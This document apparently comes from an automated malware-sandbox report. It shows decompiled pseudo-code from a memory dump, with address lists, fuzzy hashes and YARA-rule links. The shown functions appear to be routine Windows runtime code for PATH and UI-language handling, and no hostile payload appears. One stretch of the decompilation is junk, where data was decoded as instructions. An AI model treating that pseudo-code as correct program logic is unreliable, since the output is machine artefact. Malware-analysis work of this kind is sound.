0x018f48b2
0x018f48b5
0x018f48b7
0x018f48ba
0x018f48bc
0x018f48c6
0x018f48c6
0x018f48cb
0x018f48d1
0x018f48d4
0x018f48d8
0x018f48d8
0x00000000
0x018f48d8
0x018f48be
0x018f48c0
0x00000000
0x00000000
0x018f48c2
0x00000000
0x00000000
0x00000000
0x018f48c4
0x00000000
0x018f4882
0x018f487b
0x018f4904
0x018f4906
0x00000000
0x00000000
0x018f4908
0x018f490e
0x00000000
0x00000000
0x018f4910
0x018f4917
0x018f4917
0x00000000
0x018f4917
0x0189b1ba
0x018f47f9
0x018f47fc
0x00000000
0x00000000
0x00000000
0x018f47fc
0x0189b1c0
0x0189b1c0
0x0189b1c3
0x0189b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 018F48AD

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
Instruction ID: ce5285865a2780fa3f1b0083e058a57bce231662fac3dd41bdef87bd2afef046
Opcode Fuzzy Hash: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
Instruction Fuzzy Hash: B851E171E1025A8EDF35CF68C844BAEBBB0AF01714F1442AEDA59EB292D7704A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018C2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E018C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200456, char _a1546912136) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				intOrPtr _t261;
				signed int _t264;
				signed int _t271;
				signed int _t274;
				signed int _t282;
				intOrPtr _t288;
				signed int _t290;
				signed int _t292;
				void* _t293;
				signed int _t294;
				unsigned int _t297;
				signed int _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t307;
				intOrPtr _t320;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				signed int _t342;
				signed int _t345;
				void* _t346;
				void* _t348;

				_t342 = _t345;
				_t346 = _t345 - 0x4c;
				_v8 =  *0x198d360 ^ _t342;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t336 = 0x198b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t297 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t288 = 0x48;
				_t317 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t329 = 0;
				_v37 = _t317;
				if(_v48 <= 0) {
					L16:
					_t45 = _t288 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t337 = 0xc0000106;
						goto L32;
					} else {
						_t336 = L018B4620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
						_v52 = _t336;
						__eflags = _t336;
						if(_t336 == 0) {
							_t337 = 0xc0000017;
							goto L32;
						} else {
							 *(_t336 + 0x44) =  *(_t336 + 0x44) & 0x00000000;
							_t50 = _t336 + 0x48; // 0x48
							_t331 = _t50;
							_t317 = _v32;
							 *((intOrPtr*)(_t336 + 0x3c)) = _t288;
							_t290 = 0;
							 *((short*)(_t336 + 0x30)) = _v48;
							__eflags = _t317;
							if(_t317 != 0) {
								 *(_t336 + 0x18) = _t331;
								__eflags = _t317 - 0x1988478;
								 *_t336 = ((0 | _t317 == 0x01988478) - 0x00000001 & 0xfffffffb) + 7;
								E018DF3E0(_t331,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
								_t317 = _v32;
								_t346 = _t346 + 0xc;
								_t290 = 1;
								__eflags = _a8;
								_t331 = _t331 + (( *_t317 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t282 = E019239F2(_t331);
									_t317 = _v32;
									_t331 = _t282;
								}
							}
							_t301 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t337 = _v68;
								__eflags = 0;
								 *((short*)(_t331 - 2)) = 0;
								goto L32;
							} else {
								_t292 = _t336 + _t290 * 4;
								_v56 = _t292;
								do {
									__eflags = _t317;
									if(_t317 != 0) {
										_t249 =  *(_v60 + _t301 * 4);
										__eflags = _t249;
										if(_t249 == 0) {
											goto L30;
										} else {
											__eflags = _t249 == 5;
											if(_t249 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t292 =  *(_v60 + _t301 * 4);
										 *(_t292 + 0x18) = _t331;
										_t253 =  *(_v60 + _t301 * 4);
										__eflags = _t253 - 8;
										if(_t253 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t253 * 4 +  &M018C2959))) {
												case 0:
													__ax =  *0x1988488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E018DF3E0(__edi,  *0x198848c, __ax & 0x0000ffff);
														__eax =  *0x1988488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E018DF3E0(_t331, _v80, _v64);
													_t277 = _v64;
													goto L26;
												case 2:
													 *0x1988480 & 0x0000ffff = E018DF3E0(__edi,  *0x1988484,  *0x1988480 & 0x0000ffff);
													__eax =  *0x1988480 & 0x0000ffff;
													__eax = ( *0x1988480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E018DF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E018DF3E0(_t331, _v76, _v36);
														_t277 = _v36;
													}
													L26:
													_t346 = _t346 + 0xc;
													_t331 = _t331 + (_t277 >> 1) * 2 + 2;
													__eflags = _t331;
													L27:
													_push(0x3b);
													_pop(_t279);
													 *((short*)(_t331 - 2)) = _t279;
													goto L28;
												case 6:
													__ebx =  *0x198575c;
													__eflags = __ebx - 0x198575c;
													if(__ebx != 0x198575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E018DF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x198575c;
														} while (__ebx != 0x198575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1988478 & 0x0000ffff = E018DF3E0(__edi,  *0x198847c,  *0x1988478 & 0x0000ffff);
													__eax =  *0x1988478 & 0x0000ffff;
													__eax = ( *0x1988478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E019239F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1986e58 & 0x0000ffff = E018DF3E0(__edi,  *0x1986e5c,  *0x1986e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1986e58 & 0x0000ffff;
													__eax = ( *0x1986e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t301 = _v16;
													_t317 = _v32;
													L29:
													_t292 = _t292 + 4;
													__eflags = _t292;
													_v56 = _t292;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t301 = _t301 + 1;
									_v16 = _t301;
									__eflags = _t301 - _v48;
								} while (_t301 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t253 =  *(_v60 + _t329 * 4);
						if(_t253 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t253 * 4 +  &M018C2935))) {
							case 0:
								__ax =  *0x1988488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t317 =  &_v64;
								_v80 = E018C2E3E(0,  &_v64);
								_t288 = _t288 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1988480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1988480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E018AEEF0(0x19879a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E018AEB70(__ecx, 0x19879a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t227 = _v72;
											__eflags = _t227;
											if(_t227 != 0) {
												L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t227);
											}
											_t228 = _v52;
											__eflags = _t228;
											if(_t228 != 0) {
												__eflags = _t337;
												if(_t337 < 0) {
													L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t228);
													_t228 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t297 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1987b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E018AEB70(__ecx, 0x19879a0);
										__eax = _v52;
										L36:
										_pop(_t330);
										_pop(_t338);
										__eflags = _v8 ^ _t342;
										_pop(_t289);
										return E018DB640(_t228, _t289, _v8 ^ _t342, _t317, _t330, _t338);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t284 = _v56;
								if(_v56 != 0) {
									_t317 =  &_v36;
									_t286 = E018C2E3E(_t284,  &_v36);
									_t297 = _v36;
									_v76 = _t286;
								}
								if(_t297 == 0) {
									goto L44;
								} else {
									_t288 = _t288 + 2 + _t297;
								}
								goto L14;
							case 6:
								__eax =  *0x1985764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1988478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1988478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1986e58 & 0x0000ffff;
								__eax = ( *0x1986e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t329 = _t329 + 1;
								if(_t329 >= _v48) {
									goto L16;
								} else {
									_t317 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t302 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t302 = es;
					asm("o16 sub [ecx+eax+0x18c27e0], cl");
					 *[es:ecx] = es;
					_t339 = _t336 + 1;
					 *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) - _t302;
					_pop(ds);
					_pop(_t293);
					 *((intOrPtr*)(_t253 +  &_a1530200456)) =  *((intOrPtr*)(_t253 +  &_a1530200456)) + _t317;
					 *_t317 =  *_t317 + _t253;
					 *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) - _t302;
					_t254 = _t253 *  *_t331;
					 *_t302 = es;
					_push(ds);
					 *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) =  *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) - _t302;
					asm("daa");
					 *_t302 = es;
					asm("fcomp dword [ebx-0x70]");
					 *((intOrPtr*)(_t254 +  &_a1546912136)) =  *((intOrPtr*)(_t254 +  &_a1546912136)) + _t336 + 1;
					_t348 = _t346 + _t302;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x196ff00);
					E018ED08C(_t293, _t331, _t339);
					_v44 =  *[fs:0x18];
					_t332 = 0;
					 *_a24 = 0;
					_t294 = _a12;
					__eflags = _t294;
					if(_t294 == 0) {
						_t257 = 0xc0000100;
					} else {
						_v8 = 0;
						_t340 = 0xc0000100;
						_v52 = 0xc0000100;
						_t259 = 4;
						while(1) {
							_v40 = _t259;
							__eflags = _t259;
							if(_t259 == 0) {
								break;
							}
							_t307 = _t259 * 0xc;
							_v48 = _t307;
							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0x1871664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t274 = E018DE5C0(_a8,  *((intOrPtr*)(_t307 + 0x1871668)), _t294);
									_t348 = _t348 + 0xc;
									__eflags = _t274;
									if(__eflags == 0) {
										_t340 = E019151BE(_t294,  *((intOrPtr*)(_v48 + 0x187166c)), _a16, _t332, _t340, __eflags, _a20, _a24);
										_v52 = _t340;
										break;
									} else {
										_t259 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t259 = _t259 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t340;
						__eflags = _t340;
						if(_t340 < 0) {
							__eflags = _t340 - 0xc0000100;
							if(_t340 == 0xc0000100) {
								_t303 = _a4;
								__eflags = _t303;
								if(_t303 != 0) {
									_v36 = _t303;
									__eflags =  *_t303 - _t332;
									if( *_t303 == _t332) {
										_t340 = 0xc0000100;
										goto L76;
									} else {
										_t320 =  *((intOrPtr*)(_v44 + 0x30));
										_t261 =  *((intOrPtr*)(_t320 + 0x10));
										__eflags =  *((intOrPtr*)(_t261 + 0x48)) - _t303;
										if( *((intOrPtr*)(_t261 + 0x48)) == _t303) {
											__eflags =  *(_t320 + 0x1c);
											if( *(_t320 + 0x1c) == 0) {
												L106:
												_t340 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
												_v32 = _t340;
												__eflags = _t340 - 0xc0000100;
												if(_t340 != 0xc0000100) {
													goto L69;
												} else {
													_t332 = 1;
													_t303 = _v36;
													goto L75;
												}
											} else {
												_t264 = E018A6600( *(_t320 + 0x1c));
												__eflags = _t264;
												if(_t264 != 0) {
													goto L106;
												} else {
													_t303 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t340 = E018C2C50(_t303, _a8, _t294, _a16, _a20, _a24, _t332);
											L76:
											_v32 = _t340;
											goto L69;
										}
									}
									goto L108;
								} else {
									E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t340 = _a24;
									_t271 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _t340);
									_v32 = _t271;
									__eflags = _t271 - 0xc0000100;
									if(_t271 == 0xc0000100) {
										_v32 = E018C2C50(_v36, _a8, _t294, _a16, _a20, _t340, 1);
									}
									_v8 = _t332;
									E018C2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t257 = _t340;
					}
					L70:
					return E018ED0D1(_t257);
				}
				L108:
			}

0x018c2584
0x018c2586
0x018c2590
0x018c2596
0x018c2597
0x018c2598
0x018c2599
0x018c259e
0x018c25a4
0x018c25a9
0x018c25ac
0x018c25ae
0x018c25b1
0x018c25b2
0x018c25b5
0x018c25b8
0x018c25bb
0x018c25bc
0x018c25bf
0x018c25c2
0x018c25c5
0x018c25c6
0x018c25cb
0x018c25ce
0x018c25d8
0x018c25dd
0x018c25de
0x018c25e1
0x018c25e3
0x018c25e9
0x018c26da
0x018c26da
0x018c26dd
0x018c26e2
0x01905b56
0x00000000
0x018c26e8
0x018c26f9
0x018c26fb
0x018c26fe
0x018c2700
0x01905b60
0x00000000
0x018c2706
0x018c2706
0x018c270a
0x018c270a
0x018c270d
0x018c2713
0x018c2716
0x018c2718
0x018c271c
0x018c271e
0x01905b6c
0x01905b6f
0x01905b7f
0x01905b89
0x01905b8e
0x01905b93
0x01905b96
0x01905b9c
0x01905ba0
0x01905ba3
0x01905bab
0x01905bb0
0x01905bb3
0x01905bb3
0x01905ba3
0x018c2724
0x018c2726
0x018c2729
0x018c272c
0x018c279d
0x018c279d
0x018c27a0
0x018c27a2
0x00000000
0x018c272e
0x018c272e
0x018c2731
0x018c2734
0x018c2734
0x018c2736
0x01905bc1
0x01905bc1
0x01905bc4
0x00000000
0x01905bca
0x01905bca
0x01905bcd
0x00000000
0x01905bd3
0x00000000
0x01905bd3
0x01905bcd
0x018c273c
0x018c273c
0x018c2742
0x018c2747
0x018c274a
0x018c274d
0x018c2750
0x00000000
0x018c2756
0x018c2756
0x00000000
0x018c2902
0x018c2908
0x018c290b
0x00000000
0x018c2911
0x018c291c
0x018c2921
0x00000000
0x018c2921
0x00000000
0x00000000
0x018c2880
0x018c2887
0x018c288c
0x00000000
0x00000000
0x018c2805
0x018c280a
0x018c2814
0x018c2816
0x00000000
0x00000000
0x018c281e
0x018c2821
0x018c2823
0x00000000
0x018c2829
0x018c2829
0x018c2831
0x018c283c
0x018c283e
0x00000000
0x018c283e
0x00000000
0x00000000
0x018c284e
0x018c2850
0x018c2851
0x018c2854
0x018c2857
0x018c285a
0x018c285c
0x018c285d
0x00000000
0x00000000
0x018c275d
0x018c2761
0x00000000
0x018c2767
0x018c276e
0x018c2773
0x018c2773
0x018c2776
0x018c2778
0x018c277e
0x018c277e
0x018c2781
0x018c2781
0x018c2783
0x018c2784
0x00000000
0x00000000
0x01905bd8
0x01905bde
0x01905be4
0x01905be6
0x01905be8
0x01905be9
0x01905bee
0x01905bf8
0x01905bff
0x01905c01
0x01905c04
0x01905c07
0x01905c0b
0x01905c0d
0x01905c0d
0x01905c15
0x01905c18
0x01905c1b
0x01905c1b
0x01905c1e
0x00000000
0x00000000
0x018c28c3
0x018c28c8
0x018c28d2
0x018c28d4
0x018c28d8
0x018c28db
0x01905c26
0x01905c28
0x01905c2d
0x01905c2d
0x00000000
0x00000000
0x01905c34
0x01905c36
0x01905c49
0x01905c4e
0x01905c54
0x01905c5b
0x01905c5d
0x01905c60
0x018c2788
0x018c2788
0x018c278b
0x018c278e
0x018c278e
0x018c278e
0x018c2791
0x00000000
0x00000000
0x018c2756
0x018c2750
0x00000000
0x018c2794
0x018c2794
0x018c2795
0x018c2798
0x018c2798
0x00000000
0x018c2734
0x018c272c
0x018c2700
0x018c25ef
0x018c25ef
0x018c25ef
0x018c25f2
0x018c25f8
0x00000000
0x00000000
0x018c25fe
0x00000000
0x018c28e6
0x018c28ec
0x018c28ef
0x018c28f5
0x018c28f8
0x018c28f8
0x00000000
0x018c28f8
0x00000000
0x00000000
0x018c2866
0x018c2866
0x018c2876
0x018c2879
0x00000000
0x00000000
0x018c27e0
0x018c27e7
0x018c27e9
0x018c27eb
0x01905afd
0x00000000
0x01905afd
0x00000000
0x00000000
0x018c2633
0x018c2638
0x018c263b
0x018c263c
0x018c263e
0x018c2640
0x018c2642
0x018c2647
0x018c2649
0x018c264e
0x018c2650
0x018c2653
0x018c2659
0x018c26a2
0x018c26a7
0x018c26ac
0x018c26b2
0x01905b11
0x01905b15
0x01905b17
0x00000000
0x018c26b8
0x018c26b8
0x018c26ba
0x018c27a6
0x018c27a6
0x018c27a9
0x018c27ab
0x018c27b9
0x018c27b9
0x018c27be
0x018c27c1
0x018c27c3
0x018c27c5
0x018c27c7
0x01905c74
0x01905c79
0x01905c79
0x018c27c7
0x00000000
0x018c26c0
0x018c26c0
0x018c26c3
0x018c26c6
0x018c26c6
0x018c26c9
0x018c26c9
0x00000000
0x018c26c9
0x018c26ba
0x018c265b
0x018c265b
0x018c265e
0x018c2667
0x018c266d
0x018c2677
0x018c267c
0x018c267f
0x018c2681
0x01905b49
0x01905b4e
0x018c27cd
0x018c27d0
0x018c27d1
0x018c27d2
0x018c27d4
0x018c27dd
0x018c2687
0x018c2687
0x018c268a
0x018c268b
0x018c268e
0x018c268f
0x018c2691
0x018c2696
0x018c2698
0x018c269d
0x018c269f
0x00000000
0x018c269f
0x018c2681
0x00000000
0x00000000
0x018c2846
0x00000000
0x00000000
0x018c2605
0x018c260a
0x018c260c
0x018c2611
0x018c2616
0x018c2619
0x018c2619
0x018c261e
0x00000000
0x018c2624
0x018c2627
0x018c2627
0x00000000
0x00000000
0x01905b1f
0x00000000
0x00000000
0x018c2894
0x018c289b
0x018c289d
0x018c28a1
0x01905b2b
0x01905b2e
0x01905b2e
0x018c28a7
0x018c28a9
0x01905b04
0x01905b09
0x01905b09
0x01905b09
0x00000000
0x00000000
0x01905b35
0x01905b3c
0x018c28fb
0x018c28fb
0x018c26cc
0x018c26cc
0x018c26d0
0x00000000
0x018c26d2
0x018c26d2
0x00000000
0x018c26d2
0x00000000
0x00000000
0x018c25fe
0x018c292d
0x018c292f
0x018c2930
0x018c2935
0x018c2937
0x018c2939
0x018c2941
0x018c2945
0x018c2946
0x018c294d
0x018c294e
0x018c2950
0x018c2958
0x018c295a
0x018c2961
0x018c2963
0x018c2965
0x018c2966
0x018c296e
0x018c296f
0x018c2971
0x018c2974
0x018c297c
0x018c297e
0x018c297f
0x018c2980
0x018c2981
0x018c2982
0x018c2983
0x018c2984
0x018c2985
0x018c2986
0x018c2987
0x018c2988
0x018c2989
0x018c298a
0x018c298b
0x018c298c
0x018c298d
0x018c298e
0x018c298f
0x018c2990
0x018c2992
0x018c2997
0x018c29a3
0x018c29a6
0x018c29ab
0x018c29ad
0x018c29b0
0x018c29b2
0x01905c80
0x018c29b8
0x018c29b8
0x018c29bb
0x018c29c0
0x018c29c5
0x018c29c6
0x018c29c6
0x018c29c9
0x018c29cb
0x00000000
0x00000000
0x018c29cd
0x018c29d0
0x018c29d9
0x018c29db
0x018c29dd
0x018c2a7f
0x018c2a84
0x018c2a87
0x018c2a89
0x01905ca1
0x01905ca3
0x00000000
0x018c2a8f
0x018c2a8f
0x00000000
0x018c2a8f
0x00000000
0x018c29e3
0x018c29e3
0x018c29e3
0x00000000
0x018c29e3
0x018c29dd
0x00000000
0x018c29db
0x018c29e6
0x018c29e9
0x018c29eb
0x018c29ed
0x018c29f3
0x018c29f5
0x018c29f8
0x018c29fa
0x018c2a97
0x018c2a9a
0x018c2a9d
0x018c2add
0x00000000
0x018c2a9f
0x018c2aa2
0x018c2aa5
0x018c2aa8
0x018c2aab
0x01905cab
0x01905caf
0x01905cc5
0x01905cda
0x01905cdc
0x01905cdf
0x01905ce5
0x00000000
0x01905ceb
0x01905ced
0x01905cee
0x00000000
0x01905cee
0x01905cb1
0x01905cb4
0x01905cb9
0x01905cbb
0x00000000
0x01905cbd
0x01905cbd
0x00000000
0x01905cbd
0x01905cbb
0x018c2ab1
0x018c2ab1
0x018c2ac4
0x018c2ac6
0x018c2ac6
0x00000000
0x018c2ac6
0x018c2aab
0x00000000
0x018c2a00
0x018c2a09
0x018c2a0e
0x018c2a21
0x018c2a24
0x018c2a35
0x018c2a3a
0x018c2a3d
0x018c2a42
0x018c2a59
0x018c2a59
0x018c2a5c
0x018c2a5f
0x018c2a5f
0x018c29fa
0x018c29f3
0x018c2a64
0x018c2a64
0x018c2a6b
0x018c2a6b
0x018c2a6d
0x018c2a72
0x018c2a72
0x00000000

Strings

PATH, xrefs: 018C2642, 018C2691

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
Instruction ID: 0cde5366ca1c58314600aa25a42a2a22481bf368ef8d6ccec709f9fb47ff9775
Opcode Fuzzy Hash: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
Instruction Fuzzy Hash: 9AC17D75D00219DBDB25DFACD880AADBBB6FF48B44F49402DE505EB290D734EA42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 018CFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0190BE0F

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
Instruction ID: 409cd93add65739b97390d99a51716f2e49fad76829f47b14bc450a1928512df
Opcode Fuzzy Hash: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
Instruction Fuzzy Hash: 95A10575B006168FFB26DB6CC450B7AB7A6AF44B14F04456EEB0ACB681DB34DE01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01892D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 018EFA4A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
Instruction ID: 0ff1b130eab411ce3d4b9e3af4227e81f1072e0ed47c1b9616c6a145b49951f7
Opcode Fuzzy Hash: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
Instruction Fuzzy Hash: 01610671A00649AFEB32DF6CC888B7E7BE6EB45718F180659E615DB2C2C7349B008781

Uniqueness

Uniqueness Score: -1.00%

Function 01960EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01960F16

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
Instruction ID: 6091ea35545fdb4a94084e44e8140e8ecd5856ea3192f874c8c17f67712c6137
Opcode Fuzzy Hash: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
Instruction Fuzzy Hash: B851AE713043829FE725DF28D980B1BBBE9EBC4714F08492CFA9A97290D770E805C762

Uniqueness

Uniqueness Score: -1.00%

Function 018CF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 018CF124

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 5aa882849b252696784207e0e6f3c5e54acb1e63a6930c5ea86d123a1466bfe6
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 66517B715007159FD321DF18C840A6BBBF9BF88710F00492EFA96C7690E774E944CB92

Uniqueness

Uniqueness Score: -1.00%

